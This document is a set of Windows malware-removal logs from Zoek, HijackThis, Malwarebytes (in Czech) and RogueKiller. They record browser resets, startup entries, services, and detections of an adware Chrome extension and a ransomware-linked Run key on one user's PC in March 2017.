C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Local Storage\https_c.betrad.com_0.localstorage-journal deleted successfully
==== Set IE to Default ======================
Old Values:
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Use Search Asst"="yes"
New Values:
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://go.microsoft.com/fwlink/?LinkId=69157"
"Use Search Asst"="no"
==== All HKCU SearchScopes ======================
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes
"DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"
{012E1000-F331-11DB-8314-0800200C9A66} Google Url="http://www.google.com/search?q={searchTerms}"
{0633EE93-D776-472f-A0FF-E1416B8B2E3A} Bing Url="http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02"
==== Reset Google Chrome ======================
C:\Users\Nekut\AppData\Local\Chromium\User Data\Default\Preferences was reset successfully
C:\Users\Nekut\AppData\Local\Chromium\User Data\Default\Secure Preferences was reset successfully
C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Preferences was reset successfully
C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences was reset successfully
C:\Users\Nekut\AppData\Local\Chromium\User Data\Default\Web Data was reset successfully
C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Web Data was reset successfully
C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal was reset successfully
==== Deleting Registry Keys ======================
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\FEE98B82400000001520FCF3A3907BD7 deleted successfully
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{28B89EEF-0004-0000-5102-CF3F3A09B77D} deleted successfully
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\FEE98B82400000001520FCF3A3907BD7 deleted successfully
==== Empty IE Cache ======================
C:\WINDOWS\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 emptied successfully
C:\Users\Nekut\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully
C:\Users\Nekut\AppData\Local\Microsoft\Windows\INetCache\Low\Content.IE5 emptied successfully
C:\WINDOWS\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully
C:\WINDOWS\sysWoW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully
C:\WINDOWS\serviceprofiles\networkservice\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully
C:\WINDOWS\sysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully
C:\Users\Nekut\AppData\Local\Microsoft\Windows\INetCache\IE emptied successfully
C:\Users\Nekut\AppData\Local\Microsoft\Windows\INetCache\Low\IE emptied successfully
C:\WINDOWS\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE emptied successfully
C:\WINDOWS\sysWoW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE emptied successfully
C:\WINDOWS\serviceprofiles\networkservice\AppData\Local\Microsoft\Windows\INetCache\IE emptied successfully
==== Empty FireFox Cache ======================
No FireFox Profiles found
==== Empty Chrome Cache ======================
C:\Users\Nekut\AppData\Local\Chromium\User Data\Default\Cache emptied successfully
C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Cache emptied successfully
==== Empty All Flash Cache ======================
No Flash Cache Found
==== Empty All Java Cache ======================
No Java Cache Found
==== C:\zoek_backup content ======================
C:\zoek_backup (files=164 folders=60 1447156033 bytes)
==== Empty Temp Folders ======================
C:\WINDOWS\Temp will be emptied at reboot
==== After Reboot ======================
==== Empty Temp Folders ======================
C:\WINDOWS\Temp successfully emptied
C:\Users\Nekut\AppData\Local\Temp successfully emptied
==== Empty Recycle Bin ======================
C:\$RECYCLE.BIN successfully emptied
==== EOF on 15.03.2017 at 21:18:40,78 ======================
Scan saved at 21:21:58, on 15.03.2017
Platform: Unknown Windows (WinNT 6.02.1008)
MSIE: Internet Explorer v11.0 (11.00.14393.0953)
Boot mode: Normal
Running processes:
C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe
C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
C:\Users\Nekut\AppData\Local\Microsoft\OneDrive\OneDrive.exe
C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AutodeskDesktopApp.exe
C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
C:\Program Files (x86)\Autodesk\Autodesk Desktop App\acwebbrowser\acwebbrowser.exe
C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
C:\Program Files (x86)\Autodesk\Autodesk Desktop App\acwebbrowser\acwebbrowser.exe
C:\Program Files (x86)\Autodesk\Autodesk Desktop App\acwebbrowser\acwebbrowser.exe
C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Users\Nekut\Downloads\HijackThis.exe
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,SearchAssistant = www.google.com
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = www.google.com
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = www.google.com
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/p/?LinkId=255141
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/p/?LinkId=255141
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,Default_Search_URL = www.google.com
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = %11%\blank.htm
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_66\bin\ssv.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_66\bin\jp2ssv.dll
O4 - HKLM\..\Run: [Autodesk Desktop App] "C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AutodeskDesktopApp.exe" -tray
O4 - HKLM\..\Run: [SDTray] "C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe"
O4 - HKLM\..\Run: [4StoryPrePatch] C:\Program Files (x86)\GameforgeLive\Games\CZE_ces\4Story\PrePatch.exe
O4 - HKLM\..\Run: [GameforgeLive] "C:\Program Files (x86)\GameforgeLive\gfl_client.exe" -autostart
O4 - HKCU\..\Run: [OneDrive] "C:\Users\Nekut\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
O4 - HKCU\..\Run: [DAEMON Tools Lite Automount] "C:\Program Files\DAEMON Tools Lite\DTAgent.exe" -autorun
O4 - HKCU\..\Run: [BitTorrent] "C:\Users\Nekut\AppData\Roaming\BitTorrent\BitTorrent.exe" /MINIMIZED
O4 - HKCU\..\Run: [Steam] "C:\Program Files (x86)\Steam\steam.exe" -silent
O4 - HKCU\..\Run: [Autodesk Sync] C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe
O4 - HKCU\..\Run: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
O4 - HKCU\..\Run: [SpybotPostWindows10UpgradeReInstall] "C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe"
O4 - HKUS\S-1-5-18\..\Run: [Autodesk Sync] C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [Autodesk Sync] C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe (User 'Default user')
O4 - Global Startup: O&O Defrag Tray.lnk = ?
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O15 - Trusted IP range: http://192.168.10.1
O15 - ESC Trusted IP range: http://192.168.10.1
O18 - Protocol: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
O18 - Protocol: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
O20 - Winlogon Notify: SDWinLogon - SDWinLogon.dll (file missing)
O23 - Service: Autodesk Desktop App Service (AdAppMgrSvc) - Autodesk Inc. - C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AdAppMgrSvc.exe
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\WINDOWS\System32\alg.exe (file missing)
O23 - Service: @%SystemRoot%\system32\DiagSvcs\DiagnosticsHub.StandardCollector.ServiceRes.dll,-1000 (diagnosticshub.standardcollector.service) - Unknown owner - C:\WINDOWS\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe (file missing)
O23 - Service: Disc Soft Lite Bus Service - Disc Soft Ltd - C:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\WINDOWS\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\WINDOWS\system32\fxssvc.exe (file missing)
O23 - Service: FlexNet Licensing Service 64 - Flexera Software LLC - C:\Program Files\Common Files\Macrovision Shared\FlexNet Publisher\FNPLicensingService64.exe
O23 - Service: Futuremark SystemInfo Service - Futuremark - C:\Program Files (x86)\Futuremark\SystemInfo\FMSISvc.exe
O23 - Service: Služba Google Update (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Služba Google Update (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Intel(R) Capability Licensing Service TCP IP Interface - Intel(R) Corporation - C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe
O23 - Service: Intel(R) Security Assist Helper (isaHelperSvc) - Unknown owner - C:\Program Files (x86)\Intel\Intel(R) Security Assist\isaHelperService.exe
O23 - Service: Intel(R) Dynamic Application Loader Host Interface Service (jhi_service) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: LMIGuardianSvc - LogMeIn, Inc. - C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe
O23 - Service: Malwarebytes Service (MBAMService) - Malwarebytes - C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\WINDOWS\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: nProtect GameGuard Service (npggsvc) - Unknown owner - C:\WINDOWS\system32\GameMon.des.exe (file missing)
O23 - Service: NVIDIA LocalSystem Container (NvContainerLocalSystem) - NVIDIA Corporation - C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
O23 - Service: NVIDIA NetworkService Container (NvContainerNetworkService) - NVIDIA Corporation - C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
O23 - Service: NVIDIA Display Container LS (NVDisplay.ContainerLocalSystem) - NVIDIA Corporation - C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
O23 - Service: NVIDIA Wireless Controller Service - Unknown owner - C:\Program Files\NVIDIA Corporation\GeForce Experience Service\nvwirelesscontroller.exe (file missing)
O23 - Service: NVIDIA Telemetry Container (NvTelemetryContainer) - NVIDIA Corporation - C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
O23 - Service: O&O Defrag (OODefragAgent) - O&O Software GmbH - C:\Program Files\OO Software\Defrag\oodag.exe
O23 - Service: Overwolf Updater Windows SCM (OverwolfUpdater) - Unknown owner - C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\WINDOWS\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Spybot-S&D 2 Scanner Service (SDScannerService) - Safer-Networking Ltd. - C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
O23 - Service: Spybot-S&D 2 Updating Service (SDUpdateService) - Safer-Networking Ltd. - C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
O23 - Service: Spybot-S&D 2 Security Center Service (SDWSCService) - Safer-Networking Ltd. - C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
O23 - Service: @%SystemRoot%\system32\SensorDataService.exe,-101 (SensorDataService) - Unknown owner - C:\WINDOWS\System32\SensorDataService.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\WINDOWS\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\WINDOWS\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\WINDOWS\system32\sppsvc.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe
O23 - Service: @%SystemRoot%\system32\TieringEngineService.exe,-702 (TieringEngineService) - Unknown owner - C:\WINDOWS\system32\TieringEngineService.exe (file missing)
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\WINDOWS\system32\UI0Detect.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\WINDOWS\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\WINDOWS\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\WINDOWS\system32\wbengine.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-320 (WdNisSvc) - Unknown owner - C:\Program Files (x86)\Windows Defender\NisSrv.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-310 (WinDefend) - Unknown owner - C:\Program Files (x86)\Windows Defender\MsMpEng.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\WINDOWS\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)
--
End of file - 11925 bytes
Malwarebytes
www.malwarebytes.com
-Podrobnosti logovacího souboru-
Datum skenování: 15.03.17
Čas skenování: 21:23
Logovací soubor: mwanm.txt
Správce: Ano
-Informace o softwaru-
Verze: 3.0.6.1469
Verze komponentů: 1.0.75
Aktualizovat verzi balíku komponent: 1.0.1510
Licence: Zkušební
-Systémová informace-
OS: Windows 10
CPU: x64
Systém souborů: NTFS
Uživatel: DESKTOP-S3S217H\Nekut
-Shrnutí skenování-
Typ skenování: Skenování hrozeb (Threat Scan)
Výsledek: Dokončeno
Skenované objekty: 433429
Uplynulý čas: 10 min, 35 sek
-Možnosti skenování-
Paměť: Povoleno
Start: Povoleno
Systém souborů: Povoleno
Archivy: Povoleno
Rootkity: Povoleno
Heuristika: Povoleno
Potenciálně nežádoucí program: Povoleno
Potenciálně nežádoucí modifikace: Povoleno
-Podrobnosti skenování-
Proces: 0
(Nebyly zjištěny žádné škodlivé položky)
Modul: 0
(Nebyly zjištěny žádné škodlivé položky)
Klíč registru: 0
(Nebyly zjištěny žádné škodlivé položky)
Hodnota v registru: 0
(Nebyly zjištěny žádné škodlivé položky)
Data registrů: 0
(Nebyly zjištěny žádné škodlivé položky)
Datové proudy: 0
(Nebyly zjištěny žádné škodlivé položky)
Adresář: 9
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\content\webfonts, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\scripts\external, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\_metadata, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\content, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\scripts, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\images, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\icons, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\USERS\NEKUT\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\EXTENSIONS\fnhfdmnphmbbjbgppnpcddkefmeokfho, Žádná uživatelská akce, [3239], [360481],1.0.1510
Soubor: 30
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\content\webfonts\anfinity.eot, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\content\webfonts\anfinity.ttf, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\content\webfonts\anfinity.woff, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\content\fonts.css, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\content\jquery-ui.css, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\content\site.css, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\content\weather.css, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\icons\128x128.png, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\icons\16x16.png, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\icons\19x19.png, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\icons\38x38.png, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\icons\favicon.ico, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\icons\pop.png, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\images\ic_refresh_black_24dp_2x.png, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\images\ic_search_black_24dp_2x.png, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\images\logo.png, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\images\m1-min.jpg, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\scripts\external\bootstrap.min.js, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\scripts\external\jquery-ui.js, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\scripts\external\jquery.min.js, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\scripts\external\jquery.simpleWeather.min.js, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\scripts\external\list.min.js, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\scripts\external\weather.js, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\scripts\background.js, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\scripts\site.js, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\_metadata\computed_hashes.json, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\_metadata\verified_contents.json, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\main.html, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\manifest.json, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.MyRadioXP, C:\USERS\NEKUT\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\LOCAL STORAGE\chrome-extension_fnhfdmnphmbbjbgppnpcddkefmeokfho_0.localstorage, Žádná uživatelská akce, [3243], [360496],1.0.1510
Fyzický sektor: 0
(Nebyly zjištěny žádné škodlivé položky)
(end)
RogueKiller V12.10.0.0 (x64) [Mar 13 2017] (Free) by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : https://forum.adlice.com
Webová stránka : http://www.adlice.com/download/roguekiller/
Blog : http://www.adlice.com
Operační systém : Windows 10 (10.0.14393) 64 bits version
Spuštěno : Normální režim
Uživatel : Nekut [Práva správce]
Started from : C:\Users\Nekut\Downloads\RogueKillerX64.exe
Mód : Smazat -- Datum : 03/15/2017 20:26:18 (Duration : 00:24:48)
¤¤¤ Procesy : 0 ¤¤¤
¤¤¤ Registry : 11 ¤¤¤
[PUP.Gen0] (X64) HKEY_CLASSES_ROOT\CLSID\{5EC7C511-CD0F-42E6-830C-1BD9882F3458} -> Smazáno
[PUP.Gen0] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{95B7759C-8C7F-4BF1-B163-73684A933233} -> Smazáno
[Suspicious.Path] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run | D3B96F : %APPDATA%\D3B96F\FC440D.exe [x] -> Smazáno
[Suspicious.Path] (X64) HKEY_USERS\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Windows\CurrentVersion\Run | D3B96F : %APPDATA%\D3B96F\FC440D.exe [x] -> Smazáno
[Suspicious.Path|VT.Ransom:Win32/Enestedel.B!rsm] (X64) HKEY_USERS\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Windows\CurrentVersion\Run | Opwics : C:\Users\Nekut\AppData\Local\Opwics\nhspg.exe [-] -> Smazáno
